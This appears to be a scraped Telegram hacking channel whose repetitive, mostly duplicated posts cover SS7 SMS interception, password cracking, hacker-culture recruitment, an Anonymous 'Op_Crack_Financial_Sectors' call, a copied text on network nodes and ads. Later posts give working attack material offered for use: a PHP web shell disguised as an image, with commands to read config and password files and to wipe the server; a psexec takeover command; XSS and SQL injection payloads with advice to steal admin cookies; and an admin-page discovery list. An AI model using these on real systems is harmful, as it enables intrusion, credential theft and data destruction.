The SS7 vulnerability
This is a topic in phreaking.
Copyright protected
You have a phone and a sim card right?
You can send messages and receive calls
What is call roaming?
When you leave your country to maybe Siberia. If you turn on call roaming, whenever you leave your country
Your phone will tell your ISP
Hey I am no longer in Ethiopia so send all my messages to Siberia so that I can receive them
Get it?
That's call roaming
You are roaming in another network in another country
How does ss7 work
An attacker will write a script that says
Hey I am at <attackers location> so send all my messages here
Even though you are not roaming
Your ISP will forward all your messages to the attackers number
Now imagine if the attacker tries to hack your TG account
Telegra will send you a message with a code
If your ISP forwards that message to the attacker, he can use it to get in to your account and you wouldn't even know
That's all for now
I am not a phreaker so this is all I can tell you
Don't forget to share
~halo zorayo
This is a topic in phreaking.
Copyright protected
You have a phone and a sim card right?
You can send messages and receive calls
What is call roaming?
When you leave your country to maybe Siberia. If you turn on call roaming, whenever you leave your country
Your phone will tell your ISP
Hey I am no longer in Ethiopia so send all my messages to Siberia so that I can receive them
Get it?
That's call roaming
You are roaming in another network in another country
How does ss7 work
An attacker will write a script that says
Hey I am at <attackers location> so send all my messages here
Even though you are not roaming
Your ISP will forward all your messages to the attackers number
Now imagine if the attacker tries to hack your TG account
Telegra will send you a message with a code
If your ISP forwards that message to the attacker, he can use it to get in to your account and you wouldn't even know
That's all for now
I am not a phreaker so this is all I can tell you
Don't forget to share
~halo zorayo
Finally!
Our brothers (and sisters did it)!
Facebook has been hacked!
Remember guys nothing is impossible
~kasahun(halozorayo:)
Our brothers (and sisters did it)!
Facebook has been hacked!
Remember guys nothing is impossible
~kasahun(halozorayo:)
WELCOME TO THE FAMILY
who are hackers
hackers are people with the skill of entering remotely into computers to achieve a goal
are they bad?
generaly hackers dislike authority and the idea of peoples data being sold without their knowledge
so why do they hack?
for many reasons
mostly to tell people that their data is being collected and exploiting software so that programmers make safer apps
how do i become a hacker
just believe you are going to change the world
what do i need
if you want to use a phone to hack, make sure it has 2gig+ ram and install nethunter on it
if you have a pc just get any linux version
why linux
you can use any os to hack but linux is faster
what do i need to learn?
follow this posts and learn these in the order
python;ruby (beginner)
c (intermediate)
assembly (elite)
then learn about ports and standard hacking tools like hashcat, netcat nmap, psexec and metasploit
you will also need a stable internet connection
thats the minimum requirements
thanks!
welcome
~halozorayo join us @TechByte
who are hackers
hackers are people with the skill of entering remotely into computers to achieve a goal
are they bad?
generaly hackers dislike authority and the idea of peoples data being sold without their knowledge
so why do they hack?
for many reasons
mostly to tell people that their data is being collected and exploiting software so that programmers make safer apps
how do i become a hacker
just believe you are going to change the world
what do i need
if you want to use a phone to hack, make sure it has 2gig+ ram and install nethunter on it
if you have a pc just get any linux version
why linux
you can use any os to hack but linux is faster
what do i need to learn?
follow this posts and learn these in the order
python;ruby (beginner)
c (intermediate)
assembly (elite)
then learn about ports and standard hacking tools like hashcat, netcat nmap, psexec and metasploit
you will also need a stable internet connection
thats the minimum requirements
thanks!
welcome
~halozorayo join us @TechByte
A lot of people out there undervalue the power of hacking
a lot of people are so fascinated with hacking, seeing teens break into high tech companies
that they rush into hacking and by the time they realise they have been in facebook hacking groups who only talk about "how to hack NASA with html" for four years and accept that they cant be hackers
A hacker is made, not born
the truth is that "learning" hacking is not easy but once you do, hacking itself becomes very easy for you
to be a hacker, you have to surround yourself with hackers and learn more from them
after you learn to hack, you will see that anything can be hacked, it just takes time
let me give an example
whatsapp uses encryption so its fairly impossible to hack someones whatsapp account
a noob will turn away but a true hacker would wait for his victim to connect to a wifi network and send an update to the app
when the app installs this update, it becomes a trojan and now the hacker has full access to your whatsapp account
THINK!
~halozorayoo
a lot of people are so fascinated with hacking, seeing teens break into high tech companies
that they rush into hacking and by the time they realise they have been in facebook hacking groups who only talk about "how to hack NASA with html" for four years and accept that they cant be hackers
A hacker is made, not born
the truth is that "learning" hacking is not easy but once you do, hacking itself becomes very easy for you
to be a hacker, you have to surround yourself with hackers and learn more from them
after you learn to hack, you will see that anything can be hacked, it just takes time
let me give an example
whatsapp uses encryption so its fairly impossible to hack someones whatsapp account
a noob will turn away but a true hacker would wait for his victim to connect to a wifi network and send an update to the app
when the app installs this update, it becomes a trojan and now the hacker has full access to your whatsapp account
THINK!
~halozorayoo
JOHN THE RIPPER VS HASHCAT
*
JOHN
john is a very good password cracker and we hackers just love it.
It first tries to crack a hash with a dictionary attack, if it doesn't work, it tries a combination attack, only after that will it try to use a brute force attack
One thing about john is that he has an automatic hash detector
So if you don't know which type of hash, john can find it quickly, that's one thing hashcat doesn't have(if you don't know the type of hash, you can't crack it with hashcat)
*
HASHCAT
hashcat is another light weight tool which claims to be the world's fastest password cracker
in an earlier post, I used hashcat to crack a WiFi password
Let's talk about brute force attacks
You try all the possible combinations of words, letters and symbols
Brute force can never fail. But it takes a lot of time. (About 8 years for 9 characters if you use your second hand pc ,100 years if you use your phone), luckily we can use online rainbow tables and botnets to crack these in seconds.
One example is crackstation.net
But we know that most of us don't use symbols in our passwords
Our passwords are nothing like
Vrdj,:;?345%
Yep, that used to be one of my passwords
I am guessing your password is like
Password123
*
You write a word and add numbers right?
Some people even use only numbers
*smh*
That's why your account can be hacked easily.
Weak password!
Don't ask me to recover your account for you after you are hacked!
CHANGE YOUR F**KING PASSWORD RIGHT NOW!
*
That's why hash cat is the world's fastest cracker
I bet I can brute force your fb account within a week
But I am not here to fight you
Hashcat uses this brilliant smart cracking, taking a word and adding numbers so it doesn't take as long as Johnny the ripper
;)
That's another way of hacking a Facebook account
But since you guys hate the word brute force, I just keep it to myself
*
*
OK enough insults
The world is full of vulnerabilities and lazy programmers
It's our job to exploit them
#hack_teh_world
#
#for_the_lolz
#occupy_the_web
~halozorayo
*
JOHN
john is a very good password cracker and we hackers just love it.
It first tries to crack a hash with a dictionary attack, if it doesn't work, it tries a combination attack, only after that will it try to use a brute force attack
One thing about john is that he has an automatic hash detector
So if you don't know which type of hash, john can find it quickly, that's one thing hashcat doesn't have(if you don't know the type of hash, you can't crack it with hashcat)
*
HASHCAT
hashcat is another light weight tool which claims to be the world's fastest password cracker
in an earlier post, I used hashcat to crack a WiFi password
Let's talk about brute force attacks
You try all the possible combinations of words, letters and symbols
Brute force can never fail. But it takes a lot of time. (About 8 years for 9 characters if you use your second hand pc ,100 years if you use your phone), luckily we can use online rainbow tables and botnets to crack these in seconds.
One example is crackstation.net
But we know that most of us don't use symbols in our passwords
Our passwords are nothing like
Vrdj,:;?345%
Yep, that used to be one of my passwords
I am guessing your password is like
Password123
*
You write a word and add numbers right?
Some people even use only numbers
*smh*
That's why your account can be hacked easily.
Weak password!
Don't ask me to recover your account for you after you are hacked!
CHANGE YOUR F**KING PASSWORD RIGHT NOW!
*
That's why hash cat is the world's fastest cracker
I bet I can brute force your fb account within a week
But I am not here to fight you
Hashcat uses this brilliant smart cracking, taking a word and adding numbers so it doesn't take as long as Johnny the ripper
;)
That's another way of hacking a Facebook account
But since you guys hate the word brute force, I just keep it to myself
*
*
OK enough insults
The world is full of vulnerabilities and lazy programmers
It's our job to exploit them
#hack_teh_world
#
#for_the_lolz
#occupy_the_web
~halozorayo
Just thought I would mention.. If you own a MediaTek Phone, You should never use Either KingRoot or KingoRoot, both Apps are bundled with an "Hello World".APK Payload, This is the Default when Generating a Payload, which bypasses AV, - All your Data is being sent through a Meterpreter Shell to Chinese Hackers (Y) jason
i'm not owner of this post
~credit to owner
In a communications network, a network node is a connection point that can receive, create, store or send data along distributed network routes. Each network node -- whether it's an endpoint for data transmissions or a redistribution point -- has either a programmed or engineered capability to recognize, process and forward transmissions to other network nodes.
The concept of network nodes came into being with the use of distributed networks and packet switching. Depending on its application, network nodes perform a variety of functions.
Data communications
In data communications, physical network nodes include data communications equipment or devices that sit between data terminal equipment (DTE) and data transmission circuits. These include switches, bridges, modems or hubs that perform signal conversion, coding and line clocking. Network nodes in data communications also include data terminal equipment like digital telephone handsets, printers or host computers like routers, servers or workstations.
Internet network nodes
In internet and intranet networks, most physical network nodes are host computers that are identified by an IP address. Some data link devices like wireless local area network (WLAN) access points do not have IP host addresses and are considered physical network or LAN nodes rather than internet nodes or hosts.
Local area network and wide area networks
In local area networks (LANs) and wide area networks (WANs), a network node is a device that performs a specific function. Each node needs to have a MAC address for each network interface card (NIC). Examples include modems with Ethernet interfaces, wireless LAN access points and computers. If a device is offline, its function as a node will be lost.
Telecommunications network nodes
In fixed telephone networks, nodes may be public or private telephone exchanges or a computer providing an intelligent network service. In cellular communications, nodes include base station controllers that control one or more base stations. Cellular network base stations are not considered nodes.
Cable television system nodes
In cable systems, nodes have taken on a broader context and are generally associated with fiber optic cable that connects to businesses or homes served by a common fiber optic receiver within a geographic area. In cable systems, a fiber optic node describes the number of homes or businesses passed that can be served by a specific fiber node.
~credit to owner
In a communications network, a network node is a connection point that can receive, create, store or send data along distributed network routes. Each network node -- whether it's an endpoint for data transmissions or a redistribution point -- has either a programmed or engineered capability to recognize, process and forward transmissions to other network nodes.
The concept of network nodes came into being with the use of distributed networks and packet switching. Depending on its application, network nodes perform a variety of functions.
Data communications
In data communications, physical network nodes include data communications equipment or devices that sit between data terminal equipment (DTE) and data transmission circuits. These include switches, bridges, modems or hubs that perform signal conversion, coding and line clocking. Network nodes in data communications also include data terminal equipment like digital telephone handsets, printers or host computers like routers, servers or workstations.
Internet network nodes
In internet and intranet networks, most physical network nodes are host computers that are identified by an IP address. Some data link devices like wireless local area network (WLAN) access points do not have IP host addresses and are considered physical network or LAN nodes rather than internet nodes or hosts.
Local area network and wide area networks
In local area networks (LANs) and wide area networks (WANs), a network node is a device that performs a specific function. Each node needs to have a MAC address for each network interface card (NIC). Examples include modems with Ethernet interfaces, wireless LAN access points and computers. If a device is offline, its function as a node will be lost.
Telecommunications network nodes
In fixed telephone networks, nodes may be public or private telephone exchanges or a computer providing an intelligent network service. In cellular communications, nodes include base station controllers that control one or more base stations. Cellular network base stations are not considered nodes.
Cable television system nodes
In cable systems, nodes have taken on a broader context and are generally associated with fiber optic cable that connects to businesses or homes served by a common fiber optic receiver within a geographic area. In cable systems, a fiber optic node describes the number of homes or businesses passed that can be served by a specific fiber node.
LINUX
yea, i'm gonna teach you
how to become a linux wizard.
boot up your kali, and type the
following,
nya, its not going this way.
everyone knows kali,
noobs use ubuntu....
but do you really want to become the all-knowing
do you have what it take to be best?
do you thrive to be the best hacker you can possibly be??
then...
what will we use? its Arch.
Arch is the system, that
teaches you what linux is.
Learn linux think linux, and enjoy
the text based shades of gray,
allowing you full control of your device
become the god of devices,
with full control,
and learn every last bit there is,
that linux has to offer.
Is it hard?
Yes, right from CLi installation,
to manual installation, troubleshooting,
and even custom roaming into digital
world of mesmerizing hackers.
Grab the pure Arch distro mirror
from its official site,
either boot up the virtual workstation, or wine,
or just make bootable usb,
and be ready for the drive,
that you'll never forget.
HERE starts the hacking life,
that you will never ever forget.
Tip: Yay, isn't only the declaration of joy
its the official app-installer for arch ..
( depositories and all, you'll learn soon... )
remember, its Arch !
comment any questions, below.
yea, i'm gonna teach you
how to become a linux wizard.
boot up your kali, and type the
following,
nya, its not going this way.
everyone knows kali,
noobs use ubuntu....
but do you really want to become the all-knowing
do you have what it take to be best?
do you thrive to be the best hacker you can possibly be??
then...
what will we use? its Arch.
Arch is the system, that
teaches you what linux is.
Learn linux think linux, and enjoy
the text based shades of gray,
allowing you full control of your device
become the god of devices,
with full control,
and learn every last bit there is,
that linux has to offer.
Is it hard?
Yes, right from CLi installation,
to manual installation, troubleshooting,
and even custom roaming into digital
world of mesmerizing hackers.
Grab the pure Arch distro mirror
from its official site,
either boot up the virtual workstation, or wine,
or just make bootable usb,
and be ready for the drive,
that you'll never forget.
HERE starts the hacking life,
that you will never ever forget.
Tip: Yay, isn't only the declaration of joy
its the official app-installer for arch ..
( depositories and all, you'll learn soon... )
remember, its Arch !
comment any questions, below.
UNA FAMILIA GRANDE [ONE BIG FAMILY]
first of all welcome to the group
hackers are bound together, there are no boundaries
whether you are black or white, short or tall, male or female.
we all hack for one reason: to make the world a better place
so if you are learning just to commit crimes then you should probably turn back now.
you may have already learnt about black and whitehats
but i want you to know that when hacking started, all they wanted was to expose the greed and corruption of people in the world
they destroyed the face of hacking by calling the people who exposed them blackhats
then they said, why don we learn from them so we can make our networks secure to protect the monies we steal
lets all ourselfs the whitehats so people hate them and run to us
you have to understand that there are no blackhats, we are just hackers
hacking to make the world a better place
#hack_teh_world
#occupy_the_web
~halozorayo
first of all welcome to the group
hackers are bound together, there are no boundaries
whether you are black or white, short or tall, male or female.
we all hack for one reason: to make the world a better place
so if you are learning just to commit crimes then you should probably turn back now.
you may have already learnt about black and whitehats
but i want you to know that when hacking started, all they wanted was to expose the greed and corruption of people in the world
they destroyed the face of hacking by calling the people who exposed them blackhats
then they said, why don we learn from them so we can make our networks secure to protect the monies we steal
lets all ourselfs the whitehats so people hate them and run to us
you have to understand that there are no blackhats, we are just hackers
hacking to make the world a better place
#hack_teh_world
#occupy_the_web
~halozorayo
How to Dramatically reduce Data Consumption on Android
https://www.standardmedia.co.ke/business/article/2001299269/how-to-dramatically-reduce-your-mobile-data-usage-on-android
https://www.standardmedia.co.ke/business/article/2001299269/how-to-dramatically-reduce-your-mobile-data-usage-on-android
The Standard
10 Tips for dramatically reducing your mobile data usage on Android
Switching your mobile data off and on only when you want to use the internet is definitely not enough.
guys i have stopped teaching pentesting to focus on forensics and social engineering
i will make a new series teaching you how operating systems work
i wont teach you how to make one because mine programming skills are very bad
stay tuned
~halozorayo
i will make a new series teaching you how operating systems work
i wont teach you how to make one because mine programming skills are very bad
stay tuned
~halozorayo
VULNERABILITIES AND EXPLOITZ
What is a vulnerability??
Simply it's what helps you to hack a site
For example if you change a parameter from &s=1 to &s=<img src='javascript:promt("xss");'> and you see a box with xss then the site is vulnerable
Similarly, if you change it to &s=' and you get an error
You have an error in your SQL syntax it means that the site can be SQL injected
PS. This doesn't mean you have hacked the site, it just means that you have checked and found out that the site can be hacked.
But that's it
What is an exploit?
An exploit is a piece of code that takes advantage of a vulnerability to get you into the site
Let's say you found an xss bug in a site
The next question is how can I use it to hack the site?
What I would do is send it to the admin of the site so that when he clicks my link, I can steal his cookie and use it to log in as him.
Pwned!
I am now an admin of the site
Classic privilege escalation
Sweet isn't it?
Questions?
@anonyguy
~halozorayo
What is a vulnerability??
Simply it's what helps you to hack a site
For example if you change a parameter from &s=1 to &s=<img src='javascript:promt("xss");'> and you see a box with xss then the site is vulnerable
Similarly, if you change it to &s=' and you get an error
You have an error in your SQL syntax it means that the site can be SQL injected
PS. This doesn't mean you have hacked the site, it just means that you have checked and found out that the site can be hacked.
But that's it
What is an exploit?
An exploit is a piece of code that takes advantage of a vulnerability to get you into the site
Let's say you found an xss bug in a site
The next question is how can I use it to hack the site?
What I would do is send it to the admin of the site so that when he clicks my link, I can steal his cookie and use it to log in as him.
Pwned!
I am now an admin of the site
Classic privilege escalation
Sweet isn't it?
Questions?
@anonyguy
~halozorayo
HACKING THE WEB
FINALE
using psexec to hack into windows
this is a tool for login to windows
before you continue, go to google and download sysinternals.
look for psexec.exe and put it on your desktop
now open cmd and lets start hacking...
cd desktop
before you use the tool, you need the username and password of your victim
but a lot of users don have a password on the Administrator account so we can hack them without a password
psexec \\192.168.1.1 -u Administrator cmd.exe
i hope you can see that i am using it to connect to an ip address with a username administrator and run cmd
when it works, you can start using cmd to control their pc
i hope you learnt how to use it
if you need more info on this tool just google psexec and learn more about it
thats it
have fun
~halozorayo
FINALE
using psexec to hack into windows
this is a tool for login to windows
before you continue, go to google and download sysinternals.
look for psexec.exe and put it on your desktop
now open cmd and lets start hacking...
cd desktop
before you use the tool, you need the username and password of your victim
but a lot of users don have a password on the Administrator account so we can hack them without a password
psexec \\192.168.1.1 -u Administrator cmd.exe
i hope you can see that i am using it to connect to an ip address with a username administrator and run cmd
when it works, you can start using cmd to control their pc
i hope you learnt how to use it
if you need more info on this tool just google psexec and learn more about it
thats it
have fun
~halozorayo
HACKING THE WEB
method: uploading a php shell on the site
a lot of sites run php. when you put php code in an image and upload it to a server, the server will execute it
so open notepad and type these codes
<?php
if (isset($_REQUEST['cmd'])){
$cmd = $_GET['cmd'];
system($cmd);
} else {
echo "error opening image"
}
save the file as img.png and upload it to the site you want to hack (if they have image upload available)
after uploading the image, click on it and look at the url (it will end in img.png
now add
?cmd=locate+my.cnf
this command will look for the php password file
you will see some text like
/home/www/my.cnf
then read it using
?cmd=cat+/home/www/my.cnf
use this to find the database and read it using cat
?cmd=locate+*.db
use this to find the configuration file for the site(contains passwords)
?cmd=locate+config.php
use this to format the hard disk of the site
;)
?cmd=rm+-rf
happy hacking
~halozorayo
Join us @Techbyte
method: uploading a php shell on the site
a lot of sites run php. when you put php code in an image and upload it to a server, the server will execute it
so open notepad and type these codes
<?php
if (isset($_REQUEST['cmd'])){
$cmd = $_GET['cmd'];
system($cmd);
} else {
echo "error opening image"
}
save the file as img.png and upload it to the site you want to hack (if they have image upload available)
after uploading the image, click on it and look at the url (it will end in img.png
now add
?cmd=locate+my.cnf
this command will look for the php password file
you will see some text like
/home/www/my.cnf
then read it using
?cmd=cat+/home/www/my.cnf
use this to find the database and read it using cat
?cmd=locate+*.db
use this to find the configuration file for the site(contains passwords)
?cmd=locate+config.php
use this to format the hard disk of the site
;)
?cmd=rm+-rf
happy hacking
~halozorayo
Join us @Techbyte
BTC $6,472.934 (0.1%)
ETH $203.435 (0.1%)
XRP $0.456 (-0.5%)
BCH $436.938 (-0.5%)
EOS $5.375 (-0.1%)
XLM $0.232 (0.1%)
LTC $51.865 (-0.5%)
USDT $0.990 (0.2%)
ADA $0.073 (0.0%)
XMR $104.224 (-1.6%)
ETH $203.435 (0.1%)
XRP $0.456 (-0.5%)
BCH $436.938 (-0.5%)
EOS $5.375 (-0.1%)
XLM $0.232 (0.1%)
LTC $51.865 (-0.5%)
USDT $0.990 (0.2%)
ADA $0.073 (0.0%)
XMR $104.224 (-1.6%)
Million Musk March + Op_Crack_Financial_Sectors
On the 5th November Ghandi Square
Remember Anonymous location is Johannesburg Ghandi Square, those who won't be able to attend we will be streaming online and those joining up on the operation it will be online, all the targets will be posted here on channel, thank you. We are an idea. -I don't have mask.. how can I get it?at Amazon for four dollars/You can also get them at Arts&Crafts markets in your city/ if you go to big march early many will be handing them out . - how can i show the live stream? by live stream using social media such as Google hangouts, YouTube and few others and a video will be taken for those who are not able to stream online, the video will be posted in all of our social medias. any question ? @anonyguy
On the 5th November Ghandi Square
Remember Anonymous location is Johannesburg Ghandi Square, those who won't be able to attend we will be streaming online and those joining up on the operation it will be online, all the targets will be posted here on channel, thank you. We are an idea. -I don't have mask.. how can I get it?at Amazon for four dollars/You can also get them at Arts&Crafts markets in your city/ if you go to big march early many will be handing them out . - how can i show the live stream? by live stream using social media such as Google hangouts, YouTube and few others and a video will be taken for those who are not able to stream online, the video will be posted in all of our social medias. any question ? @anonyguy
FREE GIVEAWAY
add these to the end of a url to find the admin page of the site you want to hack
take a site like ballot.org and add any of these until you find the administration page
/admin/
/administrator/
/webadmin/
/adminarea/
/bb_admin/
/admin_area/
/panel-administration/
/memberadmin/
/administratorlogin/
/adm/
/admin/account.asp
/admin/index.asp
/administrator/account.html
/administrator.html
/moderator/admin.html
/admin_login.html
/panel-administrathon/login.html
/admin/home.asp
/admin.asp
/admin/controlpanel.asp
homework:
doing this manually can be tiresome
write code in any scripting language of your choice to do this for you (perl python or ruby)
tip:
the first argument (argv[0]) should be the name of the site to hack
then write a loop which tries to connect to the url and returns if it gets a 404(not found) else prints the url
~halo😊@anonyguy
add these to the end of a url to find the admin page of the site you want to hack
take a site like ballot.org and add any of these until you find the administration page
/admin/
/administrator/
/webadmin/
/adminarea/
/bb_admin/
/admin_area/
/panel-administration/
/memberadmin/
/administratorlogin/
/adm/
/admin/account.asp
/admin/index.asp
/administrator/account.html
/administrator.html
/moderator/admin.html
/admin_login.html
/panel-administrathon/login.html
/admin/home.asp
/admin.asp
/admin/controlpanel.asp
homework:
doing this manually can be tiresome
write code in any scripting language of your choice to do this for you (perl python or ruby)
tip:
the first argument (argv[0]) should be the name of the site to hack
then write a loop which tries to connect to the url and returns if it gets a 404(not found) else prints the url
~halo😊@anonyguy
Forwarded from RL advertisements
Hi, I joined Kilimall's Black Friday 2018 Bargain Activity. You can bargain items and get them for free. That's right, Ksh 0, click the link below for more:
https://m.kilimall.co.ke/bargain/share?id=K1811011835466713371&aid=K1809261419257721515
https://m.kilimall.co.ke/bargain/share?id=K1811011835466713371&aid=K1809261419257721515
👍1